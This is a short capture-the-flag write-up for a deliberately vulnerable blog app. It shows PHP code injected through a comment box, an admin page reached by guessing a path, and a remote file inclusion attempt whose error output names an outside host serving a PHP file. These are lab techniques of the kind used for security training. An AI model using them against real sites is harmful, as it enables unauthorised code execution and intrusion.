Hacker1 CTF - Cody's First Blog

Who would dare write their own blog software? Oh wait...

What a train wreck

This challenge has 3 flags, and I've managed to get 2 of them so far:

Flag 0

The "blog post" indicates that the site is powered by php. So what happens if we just include some php in the comment input box?

<?php echo '<p>Hello World</p>'; ?> 

First flag!

Flag 1

Looking at the page source shows a commented out anchor:

    <!--<a href="?page=admin.auth.inc">Admin login</a>-->

Loading that path brings up an admin log in page. No flag yet, but what if we try just admin.inc? Second flag! And we can approve comments, that's handy!

Flag 2

What are we going to do for the final flag? SQL injection on the login page? XSS in a comment? Maybe we can upload a file and include it? If we can include a remote PHP file maybe we could host it ourselves and inject some code for the target to execute.

Notice: Undefined variable: title in /app/index.php on line 30

Warning: include(http://4d4ms.com/lee.php): failed to open stream: Connection refused in /app/index.php on line 21

Warning: include(): Failed opening 'http://4d4ms.com/lee.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /app/index.php on line 21